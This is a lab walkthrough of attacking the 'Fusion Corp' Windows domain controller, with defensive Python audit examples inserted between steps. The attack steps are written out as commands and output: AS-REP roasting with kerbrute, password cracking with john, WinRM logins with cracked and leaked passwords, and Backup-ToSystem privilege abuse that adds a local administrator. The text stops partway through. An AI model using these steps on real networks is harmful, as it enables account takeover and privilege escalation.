Fusion Corp

Reconnaissance

As this is a complex Windows machine, a well-executed reconnaissance phase is critical for solving it and getting root: it tells us how to get a foothold and may also help with pivoting later on. So let us start with an aggressive Nmap scan.

sudo nmap -A -p- -v -T5 -n -Pn 10.10.120.49 -oN targeted
Nmap scan report for 10.10.120.49
Host is up (0.040s latency).
Not shown: 65513 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: eBusiness Bootstrap Template
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-06-26 17:40:55Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: fusion.corp0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: fusion.corp0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2022-06-26T17:42:28+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=Fusion-DC.fusion.corp
| Issuer: commonName=Fusion-DC.fusion.corp
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-06-25T17:36:29
| Not valid after:  2022-12-25T17:36:29
| MD5:   6218 0cb4 ee16 8c28 0d16 358c 75f5 80a4
|_SHA-1: ebee d9d4 c101 d934 4679 90fe e8fe e48b c503 ab79
| rdp-ntlm-info: 
|   Target_Name: FUSION
|   NetBIOS_Domain_Name: FUSION
|   NetBIOS_Computer_Name: FUSION-DC
|   DNS_Domain_Name: fusion.corp
|   DNS_Computer_Name: Fusion-DC.fusion.corp
|   Product_Version: 10.0.17763
|_  System_Time: 2022-06-26T17:41:49+00:00
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49690/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Timing level 5 (Insane) used
No OS matches for host
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: FUSION-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-06-26T17:41:50
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required

TRACEROUTE (using port 135/tcp)
HOP RTT      ADDRESS
1   40.01 ms 10.8.0.1
2   40.03 ms 10.10.120.49

Quite a lot at first look, but since the host is the domain controller it is not surprising to see so many services. We can also see that the domain name is "fusion.corp", so I recommend adding it to /etc/hosts.
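To turn a report like the one above into something checkable rather than read by eye, here is an added Python example (mine, not part of the original write-up and not Nmap's own code) that parses the normal-output (-oN) port table, recognises the domain-controller signature (DNS, Kerberos and LDAP open together), pulls out the identity facts and produces review items. The trimmed SAMPLE_NMAP excerpt and the ADMIN_ONLY policy are assumptions constructed for the example.

```python
import re

# Constructed excerpt of the "nmap -oN" report above; a handful of lines is enough to
# exercise the parser (the real scan lists more ports).
SAMPLE_NMAP = """\
Nmap scan report for 10.10.120.49
Host is up (0.040s latency).
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-06-26 17:40:55Z)
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: fusion.corp0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   DNS_Domain_Name: fusion.corp
|   DNS_Computer_Name: Fusion-DC.fusion.corp
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

# Ports whose exposure beyond an admin network is worth a finding on a domain
# controller (assumption for this example; tune to the environment).
ADMIN_ONLY = {3389: "RDP", 5985: "WinRM"}


def parse_ports(report):
    """Return one dict per port line of an -oN report (script output lines are skipped)."""
    ports = []
    for line in report.splitlines():
        m = PORT_LINE.match(line)
        if m:
            ports.append({
                "port": int(m.group(1)),
                "proto": m.group(2),
                "state": m.group(3),
                "service": m.group(4),
                "version": m.group(5).strip(),
            })
    return ports


def looks_like_domain_controller(ports):
    """DNS + Kerberos + LDAP open together is the classic DC signature."""
    open_ports = {p["port"] for p in ports if p["state"] == "open"}
    return {53, 88, 389} <= open_ports


def extract_facts(report):
    """Pull the identity facts a reader would otherwise copy by hand."""
    def grab(pattern):
        m = re.search(pattern, report)
        return m.group(1).strip() if m else None

    return {
        "dns_domain": grab(r"DNS_Domain_Name:\s*(\S+)"),
        "dns_hostname": grab(r"DNS_Computer_Name:\s*(\S+)"),
        "smb_signing_required": "Message signing enabled and required" in report,
        "risky_http_methods": grab(r"Potentially risky methods:\s*(.+)"),
    }


def findings(report):
    """Turn the scan into review items: admin protocols exposed, TRACE, missing signing."""
    items = []
    for p in parse_ports(report):
        if p["state"] == "open" and p["port"] in ADMIN_ONLY:
            items.append(f"{ADMIN_ONLY[p['port']]} ({p['port']}/{p['proto']}) reachable from the scanning host")
    facts = extract_facts(report)
    if facts["risky_http_methods"]:
        items.append(f"HTTP methods flagged by nmap: {facts['risky_http_methods']}")
    if not facts["smb_signing_required"]:
        items.append("SMB signing not required")
    return items


if __name__ == "__main__":
    print("domain controller:", looks_like_domain_controller(parse_ports(SAMPLE_NMAP)))
    for item in findings(SAMPLE_NMAP):
        print("-", item)
```

Run against the full report the same functions give the complete inventory; the interesting part for a defender is that RDP and WinRM on a DC answer from an arbitrary network position, while SMB signing being required (as here) closes off relay-style abuse.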

One simple and fast tool to use in these cases is enum4linux, as it performs a quick reconnaissance of RPC, SMB, LDAP, etc.

enum4linux fusion.corp
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jun 26 13:44:41 2022

 =========================================( Target Information )=========================================

Target ........... 10.10.120.49
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ============================( Enumerating Workgroup/Domain on 10.10.120.49 )============================


[E] Can't find workgroup/domain



 ================================( Nbtstat Information for 10.10.120.49 )================================

Looking up status of 10.10.120.49
No reply from 10.10.120.49

 ===================================( Session Check on 10.10.120.49 )===================================


[+] Server 10.10.120.49 allows sessions using username '', password ''


 ================================( Getting domain SID for 10.10.120.49 )================================

Domain Name: FUSION
Domain Sid: S-1-5-21-1898838421-3672757654-990739655

[+] Host is part of a domain (not a workgroup)


 ===================================( OS information on 10.10.120.49 )===================================


[E] Can't get OS info with smbclient


[+] Got OS info for 10.10.120.49 from srvinfo: 
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED


 =======================================( Users on 10.10.120.49 )=======================================


[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED



[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED


 =================================( Share Enumeration on 10.10.120.49 )=================================

do_connect: Connection to 10.10.120.49 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.120.49


 ============================( Password Policy Information for 10.10.120.49 )============================


[E] Unexpected error from polenum:



[+] Attaching to 10.10.120.49 using a NULL share

[+] Trying protocol 139/SMB...

        [!] Protocol failed: Cannot request session (Called Name:10.10.120.49)

[+] Trying protocol 445/SMB...

        [!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.



[E] Failed to get password policy with rpcclient



 =======================================( Groups on 10.10.120.49 )=======================================


[+] Getting builtin groups:


[+]  Getting builtin group memberships:


[+]  Getting local groups:


[+]  Getting local group memberships:


[+]  Getting domain groups:


[+]  Getting domain group memberships:


 ==================( Users on 10.10.120.49 via RID cycling (RIDS: 500-550,1000-1050) )==================


[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.


 ===============================( Getting printer info for 10.10.120.49 )===============================

do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED


enum4linux complete on Sun Jun 26 13:45:09 2022

Well, that really was not as helpful as one would have hoped, so let's move on to more advanced/manual enumeration.

Foothold

It seems RPC and SMB need credentials to list content, and we do not yet have valid usernames for any Kerberos attacks, so the next step is to take a look at the web application.

At first it looks like a WIP Bootstrap template, so my first thought, since we had a valid domain name, was to search for subdomains.

gobuster vhost -u "http://fusion.corp" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -t 64
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://fusion.corp
[+] Method:       GET
[+] Threads:      64
[+] Wordlist:     /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2022/06/26 13:56:08 Starting gobuster in VHOST enumeration mode
===============================================================
                                
===============================================================
2022/06/26 13:56:38 Finished
===============================================================

Nothing, so the next logical step was to try directory enumeration.

gobuster dir -u "http://fusion.corp" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://fusion.corp
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/06/26 13:57:18 Starting gobuster in directory enumeration mode
===============================================================
/img                  (Status: 301) [Size: 146] [--> http://fusion.corp/img/]
/css                  (Status: 301) [Size: 146] [--> http://fusion.corp/css/]
/lib                  (Status: 301) [Size: 146] [--> http://fusion.corp/lib/]
/js                   (Status: 301) [Size: 145] [--> http://fusion.corp/js/] 
/backup               (Status: 301) [Size: 149] [--> http://fusion.corp/backup/]
/Backup               (Status: 301) [Size: 149] [--> http://fusion.corp/Backup/]
/IMG                  (Status: 301) [Size: 146] [--> http://fusion.corp/IMG/]   
/contactform          (Status: 301) [Size: 154] [--> http://fusion.corp/contactform/]
/CSS                  (Status: 301) [Size: 146] [--> http://fusion.corp/CSS/]        
/Img                  (Status: 301) [Size: 146] [--> http://fusion.corp/Img/]        
/JS                   (Status: 301) [Size: 145] [--> http://fusion.corp/JS/]         
/Lib                  (Status: 301) [Size: 146] [--> http://fusion.corp/Lib/]        
                                                                                     
===============================================================
2022/06/26 14:02:47 Finished
===============================================================

Now we finally have something: a backup directory with directory listing enabled, which exposes a backup file "employees.ods" that we can download.
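The defender's side of that finding, as an added example that is not from the original write-up: a Python audit that parses an IIS web.config for the directoryBrowse setting and the request-filtering hiddenSegments list, with a constructed weak fragment beside a hardened one, plus a recogniser for the IIS listing page itself so an external check can spot a browsable folder. The MUST_HIDE set, both config fragments and the listing body are assumptions made up for the example.

```python
import re
import xml.etree.ElementTree as ET

# Constructed web.config fragments (not taken from the target). The first enables
# directory browsing, which is what turns a folder like /backup/ into a browsable
# listing; the second disables it and also hides the "backup" segment via request
# filtering, so the folder is not served even if browsing is re-enabled later.
WEAK_WEB_CONFIG = """<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <system.webServer>
    <directoryBrowse enabled="true" showFlags="Date, Time, Size" />
  </system.webServer>
</configuration>
"""

HARDENED_WEB_CONFIG = """<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <system.webServer>
    <directoryBrowse enabled="false" />
    <security>
      <requestFiltering>
        <hiddenSegments>
          <add segment="backup" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
"""

# Constructed response body in the shape IIS produces for a browsable folder.
IIS_LISTING_BODY = """<html><head><title>fusion.corp - /backup/</title></head>
<body><H1>fusion.corp - /backup/</H1><hr>
<pre><A HREF="/">[To Parent Directory]</A><br><br>
 3/3/2021  6:04 AM        18304 <A HREF="/backup/employees.ods">employees.ods</A><br>
</pre><hr></body></html>
"""

# Segments this site must never serve (assumption for the example).
MUST_HIDE = {"backup"}
TITLE_RE = re.compile(r"<title>[^<]* - /[^<]*</title>", re.I)
LINK_RE = re.compile(r'<A HREF="[^"]*/([^"/]+)">\1</A>', re.I)


def audit_web_config(xml_text):
    """Findings for one web.config; an empty list means nothing to report."""
    root = ET.fromstring(xml_text)
    findings = []
    for el in root.iter("directoryBrowse"):
        if el.get("enabled", "false").lower() == "true":
            findings.append("directoryBrowse enabled: folders without a default document are listable")
    hidden = {add.get("segment", "").lower()
              for hs in root.iter("hiddenSegments") for add in hs.findall("add")}
    missing = sorted(MUST_HIDE - hidden)
    if missing:
        findings.append("segments not blocked by request filtering: " + ", ".join(missing))
    return findings


def is_iis_directory_listing(body):
    """Recognise an IIS listing page from its fixed markers (for an external check)."""
    return "[To Parent Directory]" in body and TITLE_RE.search(body) is not None


def listed_files(body):
    """File names linked from a listing, i.e. what any visitor could download."""
    return [m.group(1) for m in LINK_RE.finditer(body)]


if __name__ == "__main__":
    print("weak:", audit_web_config(WEAK_WEB_CONFIG))
    print("hardened:", audit_web_config(HARDENED_WEB_CONFIG))
    if is_iis_directory_listing(IIS_LISTING_BODY):
        print("listing exposed:", listed_files(IIS_LISTING_BODY))
```

Disabling directory browsing alone is not enough if the file names are guessable, which is why the hardened fragment also blocks the segment; the real fix is to keep backups out of the web root altogether.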

From it we have some potential usernames, which we can now try to validate with kerbrute.

go run main.go userenum --domain fusion.corp --dc 10.10.120.49 ../users.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 06/26/22 - Ronnie Flathers @ropnop

2022/06/26 14:08:35 >  Using KDC(s):
2022/06/26 14:08:35 >   10.10.120.49:88

2022/06/26 14:08:36 >  [+] lparker has no pre auth required. Dumping hash to crack offline:
$krb5asrep$18$lparker@FUSION.CORP:70bcaabfba43d1b9cf13057672680bdb$a664505d347d254bed42cc46fe73a6bbc974ed2eaadf31797601365d097a04f0e1845649c750af6650fdfa853d8b779450a386cd46d5d8e3d042612fba0ad77db00b8c2ebe93f4bba12843ad30f4d9ab9dfdcd235e24434dd60e5b54a0a0d0134d428d0d212059222d43e5809e49d929c03e15acbabae666c536bc344569fb5c0e166baf97dc24240e172a323855729294dc95cce30423315c08ce3ddbd990e1626f10e44bd3b7ce239a633e1abf993610714c734bfe30a8ce23675ca1788a08e8f2b133c863e34c46155c31270d89574689a99fb9482812b5985513035001e633aca51571e812a2bf3b4f0c99c142483cfefdbc96204a4b8c82b823d1f6
2022/06/26 14:08:36 >  [+] VALID USERNAME:       lparker@fusion.corp
2022/06/26 14:08:36 >  Done! Tested 11 usernames (1 valid) in 0.090 seconds

Perfect, "lparker" is a valid user and is vulnerable to AS-REP roasting (note that you can also use impacket-GetNPUsers or Rubeus to get the same result), so the next step is to crack its hash offline with e.g. hashcat or john.
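Added example (mine, not the page's or kerbrute's code) covering both sides of that finding: it parses a dumped line into its fields so the encryption type is visible, and it runs the directory-side audit that finds the same accounts by decoding the DONT_REQ_PREAUTH bit (0x400000) of userAccountControl. The SAMPLE_LINE uses dummy hex and the ACCOUNTS export is constructed.

```python
import re

# Line format kerbrute dumps (and john reads):
#   $krb5asrep$<etype>$<user>@<REALM>:<checksum>$<ciphertext>
ASREP_LINE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@$:]+)@(?P<realm>[^:$]+):"
    r"(?P<checksum>[0-9a-f]+)\$(?P<cipher>[0-9a-f]+)$", re.I)

ETYPE_NAMES = {23: "rc4-hmac", 17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96"}

# Constructed sample line with short dummy hex; not the hash from the page.
SAMPLE_LINE = ("$krb5asrep$18$lparker@FUSION.CORP:"
               "00112233445566778899aabbccddeeff$0123456789abcdef0123456789abcdef")

# userAccountControl bits relevant here (values from the AD schema).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",
}

# Constructed (sAMAccountName, userAccountControl) export, as an LDAP search or
# Get-ADUser -Properties userAccountControl would return it.
ACCOUNTS = [("lparker", 0x400200), ("jmurphy", 0x10200), ("svc_legacy", 0x400202)]


def parse_asrep_line(line):
    """Split a dumped AS-REP line into its fields, or return None if it is not one."""
    m = ASREP_LINE.match(line.strip())
    if not m:
        return None
    etype = int(m.group("etype"))
    return {
        "user": m.group("user"),
        "realm": m.group("realm"),
        "etype": etype,
        "etype_name": ETYPE_NAMES.get(etype, "unknown"),
        # RC4 (23) keys are the raw NT hash; AES (17/18) keys go through PBKDF2 with
        # 4096 iterations (RFC 3962), so each offline guess costs far more.
        "slow_to_crack": etype in (17, 18),
        "checksum_bytes": len(m.group("checksum")) // 2,
    }


def uac_flags(value):
    """Names of the known bits set in a userAccountControl value."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def asrep_roastable(accounts):
    """Enabled accounts with DONT_REQ_PREAUTH set, the condition kerbrute reports as
    'has no pre auth required'."""
    return [sam for sam, uac in accounts if uac & 0x400000 and not uac & 0x0002]


if __name__ == "__main__":
    print(parse_asrep_line(SAMPLE_LINE))
    for sam, uac in ACCOUNTS:
        print(sam, hex(uac), uac_flags(uac))
    print("roastable:", asrep_roastable(ACCOUNTS))
```

On a real domain the same audit is one line of the AD module, `Get-ADUser -Filter 'DoesNotRequirePreAuth -eq $true'`, and the fix is clearing the flag with `Set-ADAccountControl -Identity <user> -DoesNotRequirePreAuth $false`; where an application genuinely needs pre-authentication off, a long random password is what makes the dumped blob useless offline.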

john lparker.krb -w=rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!!abbylvzsvs2k6! ($krb5asrep$23$lparker@FUSION.CORP)     
1g 0:00:00:00 DONE (2022-06-26 14:16) 1.052g/s 2591Kp/s 2591Kc/s 2591KC/s !@#$%&..หรพรืะฟๅ/-ภ
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Nice, we finally have our first credentials. CrackMapExec is a good tool to validate them.

crackmapexec smb fusion.corp -u 'lparker' -p '!!abbylvzsvs2k6!'
SMB         fusion.corp     445    FUSION-DC        [*] Windows 10.0 Build 17763 x64 (name:FUSION-DC) (domain:fusion.corp) (signing:True) (SMBv1:False)
SMB         fusion.corp     445    FUSION-DC        [+] fusion.corp\lparker:!!abbylvzsvs2k6!

For some reason CrackMapExec didn't work with WinRM, but trying it manually with evil-winrm lets us log in remotely.

evil-winrm -i fusion.corp -u 'lparker' -p '!!abbylvzsvs2k6!'

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\lparker\Documents> cd ..
*Evil-WinRM* PS C:\Users\lparker> cd Desktop
*Evil-WinRM* PS C:\Users\lparker\Desktop> dir


    Directory: C:\Users\lparker\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         3/3/2021   6:04 AM             37 flag.txt


*Evil-WinRM* PS C:\Users\lparker\Desktop> type flag.txt
THM{redacted}
*Evil-WinRM* PS C:\Users\lparker\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\lparker\Desktop>

Nice, we finally have a foothold. Let us move on to pivoting now.

Pivoting

Looking at C:\Users\, we can see another user, "jmurphy", besides our current "lparker" user and Administrator, so we may need to keep enumerating to find valid credentials for that user.

Gathering some information on the domain, it looks like jmurphy's password is leaked in the user's description field, which net user shows as "Comment".

*Evil-WinRM* PS C:\Users> net user jmurphy
User name                    jmurphy
Full Name                    Joseph Murphy
Comment                      Password set to u8WC3!kLsgw=#bRY
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            3/3/2021 6:41:24 AM
Password expires             Never
Password changeable          3/3/2021 6:41:24 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Backup Operators     *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users> 

Well, that was easy. If our initial PowerShell session had come from a reverse shell, we would need to spawn another reverse shell to get a session as jmurphy; but since the WinRM service is open, we can simply log in as jmurphy the same way we did as lparker.
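The hygiene checks a defender would run for the two weaknesses this step relies on, as an added Python example that is not part of the original write-up: credentials left in the description (Comment) field, and a regular user sitting in Backup Operators. The ACCOUNTS export with its made-up description strings, the SECRET_CUE heuristic and the APPROVED_MEMBERSHIPS list are assumptions for the example.

```python
import re

# Constructed directory export (not the target's real data): one row per account with
# the attribute "net user" prints as "Comment" (AD: description) and its group memberships.
ACCOUNTS = [
    {"sam": "jmurphy", "description": "Password set to Wint3r!Temp#2021",
     "groups": ["Backup Operators", "Remote Management Users", "Domain Users"]},
    {"sam": "lparker", "description": "",
     "groups": ["Remote Management Users", "Domain Users"]},
    {"sam": "svc_backup", "description": "Nightly backup job account",
     "groups": ["Backup Operators", "Domain Users"]},
    {"sam": "hr.intern", "description": "pwd: Summer2022 (change on first login)",
     "groups": ["Domain Users"]},
]

# A credential cue word, optional filler ("set to", "is", ":"), then the candidate token.
SECRET_CUE = re.compile(
    r"\b(pass(word|wd)?|pwd|pin|secret|cred(ential)?s?)\b[\s:=-]*(set to|is|=|:)?\s*(\S{6,})",
    re.I)

# Groups whose membership hands out sensitive privileges at logon (Backup Operators
# grants SeBackupPrivilege/SeRestorePrivilege, as the whoami /priv output shows).
PRIVILEGED_GROUPS = {"Administrators", "Domain Admins", "Enterprise Admins", "Backup Operators",
                     "Server Operators", "Account Operators", "Print Operators"}
# Assumption for this example: memberships that were reviewed and approved.
APPROVED_MEMBERSHIPS = {("svc_backup", "Backup Operators")}


def looks_like_secret(token):
    """Shape check: long enough and drawn from at least two character classes, so a
    sentence like "password rotated monthly" does not fire."""
    classes = sum([any(c.islower() for c in token), any(c.isupper() for c in token),
                   any(c.isdigit() for c in token), any(not c.isalnum() for c in token)])
    return len(token) >= 6 and classes >= 2


def description_leaks(accounts):
    """Accounts whose description/comment appears to contain a credential."""
    hits = []
    for acct in accounts:
        for m in SECRET_CUE.finditer(acct["description"]):
            if looks_like_secret(m.group(5)):
                hits.append(acct["sam"])
                break
    return hits


def unapproved_privileged_memberships(accounts):
    """(account, group) pairs in privileged groups that are not on the approved list."""
    out = []
    for acct in accounts:
        for group in acct["groups"]:
            if group in PRIVILEGED_GROUPS and (acct["sam"], group) not in APPROVED_MEMBERSHIPS:
                out.append((acct["sam"], group))
    return out


if __name__ == "__main__":
    print("possible credentials in descriptions:", description_leaks(ACCOUNTS))
    print("privileged memberships to review:", unapproved_privileged_memberships(ACCOUNTS))
```

The description attribute is readable by every authenticated domain user, which is why a low-privileged foothold like lparker's was enough to read it here; a periodic export of description and info attributes through this kind of filter catches the pattern before someone else does.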

evil-winrm -i fusion.corp -u jmurphy -p "u8WC3!kLsgw=#bRY"

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\jmurphy\Documents> cd ..
*Evil-WinRM* PS C:\Users\jmurphy> cd Desktop
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> dir


    Directory: C:\Users\jmurphy\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         3/3/2021   6:04 AM             37 flag.txt


*Evil-WinRM* PS C:\Users\jmurphy\Desktop> type flag.txt
THM{redacted}
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> 

Perfect, let us try to pivot to domain admin now.

Administrator

Looking back at the privileges from the last command, we can see that we have privileges to back up as well as restore files in the filesystem. One way to abuse this is to modify ACLs as we please and, that way, add a user and assign it administrator privileges. For that, I am going to use this PowerShell script.

*Evil-WinRM* PS C:\Users\jmurphy\Documents> upload Backup-ToSystem.ps1
Info: Uploading Backup-ToSystem.ps1 to C:\Users\jmurphy\Documents\Backup-ToSystem.ps1

                                                             
Data: 6152 bytes of 6152 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\jmurphy\Documents> Import-Module C:\Users\jmurphy\Documents\Backup-ToSystem.ps1
*Evil-WinRM* PS C:\Users\jmurphy\Documents> Backup-ToSystem -command "net user max TestVar123 /add"
   ___            _               ____  __           _
  / __\ __ _  ___| | ___   _ _ __|___ \/ _\_   _ ___| |_ ___ _ __ ___
 /__\/// _` |/ __| |/ / | | | '_ \ __) \ \| | | / __| __/ _ \ '_ ` _ \
/ \/  \ (_| | (__|   <| |_| | |_) / __/_\ \ |_| \__ \ ||  __/ | | | | |
\_____/\__,_|\___|_|\_\\__,_| .__/_____\__/\__, |___/\__\___|_| |_| |_|
                            |_|            |___/                       

                                                   by CyberVaca
[+] Backup ACL
[+] Changing ACL
[+] Writing Payload
Warning: Waiting for service 'Virtual Disk (vds)' to stop...
Warning: Waiting for service 'Virtual Disk (vds)' to stop...
Warning: Waiting for service 'Virtual Disk (vds)' to stop...
Warning: Waiting for service 'Virtual Disk (vds)' to stop...
Warning: Waiting for service 'Virtual Disk (vds)' to stop...
Warning: Waiting for service 'Virtual Disk (vds)' to stop...
Warning: Waiting for service 'Virtual Disk (vds)' to stop...
[+] Trigger Payload
[+] Deleting temp Files
[+] Restore files
[+] Restore backup ACL

*Evil-WinRM* PS C:\Users\jmurphy\Documents> net user max
User name                    max
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            6/26/2022 1:53:24 PM
Password expires             Never
Password changeable          6/26/2022 1:53:24 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users
The command completed successfully.

However, we can see that we aren't in the Administrators group yet, but we can easily add ourselves to the group in the same manner.

*Evil-WinRM* PS C:\Users\jmurphy\Documents> Backup-ToSystem -command "net localgroup Administrators max /add"
   ___            _               ____  __           _
  / __\ __ _  ___| | ___   _ _ __|___ \/ _\_   _ ___| |_ ___ _ __ ___
 /__\/// _` |/ __| |/ / | | | '_ \ __) \ \| | | / __| __/ _ \ '_ ` _ \
/ \/  \ (_| | (__|   <| |_| | |_) / __/_\ \ |_| \__ \ ||  __/ | | | | |
\_____/\__,_|\___|_|\_\\__,_| .__/_____\__/\__, |___/\__\___|_| |_| |_|
                            |_|            |___/                       

                                                   by CyberVaca
[+] Backup ACL
[+] Changing ACL
[+] Writing Payload
[+] Trigger Payload
[+] Deleting temp Files
[+] Restore files
[+] Restore backup ACL

*Evil-WinRM* PS C:\Users\jmurphy\Documents> net user max
User name                    max
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

